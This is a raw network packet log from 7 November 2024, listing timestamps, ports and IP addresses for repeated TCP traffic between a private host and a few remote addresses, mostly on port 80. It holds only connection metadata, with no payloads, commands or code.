Nov 7, 2024 07:33:26.256691933 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.256722927 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.279728889 CET	49908	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:26.279740095 CET	443	49908	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:26.279887915 CET	49908	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:26.280808926 CET	49908	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:26.280818939 CET	443	49908	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:26.286480904 CET	49909	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:26.286499023 CET	443	49909	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:26.286556005 CET	49909	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:26.286953926 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.286971092 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.286982059 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.286998034 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.287019014 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.287025928 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.287062883 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.287072897 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.287082911 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.287095070 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.287101030 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.287106991 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.287139893 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.287152052 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.287229061 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.287240982 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.287252903 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.287261009 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.287271023 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.287280083 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.287309885 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.287405014 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.287416935 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.287426949 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.287439108 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.287450075 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.287450075 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.287460089 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.287470102 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.287477016 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.287497997 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.287508011 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.287533998 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.287544012 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.287575960 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.287652016 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.287663937 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.287677050 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.287688017 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.287698984 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.287708998 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.287709951 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.287722111 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.287733078 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.287739038 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.287744999 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.287761927 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.287781954 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.287935972 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.287970066 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.287972927 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.287981033 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.287991047 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.288009882 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.288028002 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.303535938 CET	49909	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:26.303546906 CET	443	49909	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:26.328058004 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.328083992 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.328094959 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.328111887 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.328128099 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.370167971 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.370183945 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.370194912 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.370235920 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.370258093 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.370275021 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.370285988 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.370295048 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.370306015 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.370320082 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.370345116 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.370405912 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.370419025 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.370430946 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.370440006 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.370441914 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.370456934 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.370486021 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.370569944 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.370579004 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.370589018 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.370599985 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.370609999 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.370611906 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.370625973 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.370656013 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.370693922 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.370717049 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.370727062 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.370737076 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.370753050 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.370759964 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.370786905 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.370929956 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.370940924 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.370951891 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.370961905 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.370966911 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.370975018 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.370984077 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.370990038 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.371017933 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.371088982 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.371100903 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.371109962 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.371120930 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.371129990 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.371133089 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.371150970 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.371177912 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.371325970 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.371335983 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.371345043 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.371355057 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.371364117 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.371366978 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.371376038 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.371386051 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.371387005 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.371396065 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.371404886 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.371418953 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.371424913 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.371443033 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.371603966 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.371614933 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.371623993 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.371634960 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.371645927 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.371649027 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.371654987 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.371695042 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.371870995 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.371881962 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.371891975 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.371902943 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.371912956 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.371913910 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.371923923 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.371928930 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.371933937 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.371939898 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.371951103 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.371962070 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.371968031 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.371972084 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.371984005 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.372003078 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.372011900 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.372188091 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.372199059 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.372215986 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.372227907 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.372231960 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.372239113 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.372250080 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.372253895 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.372261047 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.372282982 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.372308016 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.372454882 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.372466087 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.372476101 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.372503042 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.372513056 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.372601986 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.372612000 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.372621059 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.372632027 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.372638941 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.372642994 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.372654915 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.372658968 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.372664928 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.372678041 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.372688055 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.372694016 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.372698069 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.372708082 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.372713089 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.372720003 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.372730970 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.372742891 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.372786999 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.372910023 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.372955084 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.373013973 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.373024940 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.373034000 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.373045921 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.373053074 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.373055935 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.373073101 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.373081923 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.373087883 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.373090982 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.373097897 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.373109102 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.373120070 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.373147011 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.373315096 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.373326063 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.373342991 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.373353958 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.373354912 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.373363972 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.373373985 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.373378038 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.373383999 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.373403072 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.373429060 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.373588085 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.373599052 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.373609066 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.373621941 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.373634100 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.373634100 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.373645067 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.373656034 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.373656988 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.373667002 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.373672962 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.373677015 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.373687983 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.373693943 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.373699903 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.373723984 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.373769045 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.373823881 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.373836040 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.373843908 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.373855114 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.373869896 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.373872042 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.373883963 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.373886108 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.373920918 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.373946905 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.374114037 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.374156952 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.374315977 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.374327898 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.374337912 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.374349117 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.374361038 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.374361038 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.374372005 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.374381065 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.374382019 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.374392986 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.374402046 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.374409914 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.374412060 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.374424934 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.374434948 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.374435902 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.374445915 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.374449015 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.374459028 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.374469042 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.374480009 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.374485016 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.374515057 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.374816895 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.374830008 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.374840975 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.374852896 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.374865055 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.374866009 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.374876022 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.374891043 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.374912024 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.375051022 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.375087976 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.375098944 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.375109911 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.375121117 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.375132084 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.375134945 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.375140905 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.375144005 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.375152111 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.375164032 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.375164032 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.375174999 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.375186920 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.375197887 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.375250101 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.375401020 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.375411987 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.375425100 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.375435114 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.375447035 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.375458956 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.375489950 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.375554085 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.375566006 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.375591040 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.375614882 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.375679016 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.375690937 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.375701904 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.375713110 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.375722885 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.375734091 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.375735044 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.375745058 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.375756979 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.375762939 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.375771046 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.375787973 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.375797033 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.375822067 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.406434059 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.406474113 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.406481028 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.406485081 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.406511068 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.406513929 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.406527996 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.406558037 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.406558990 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.406575918 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.406606913 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.406640053 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.406665087 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.406677008 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.406687975 CET	80	49882	185.215.113.16	192.168.2.4
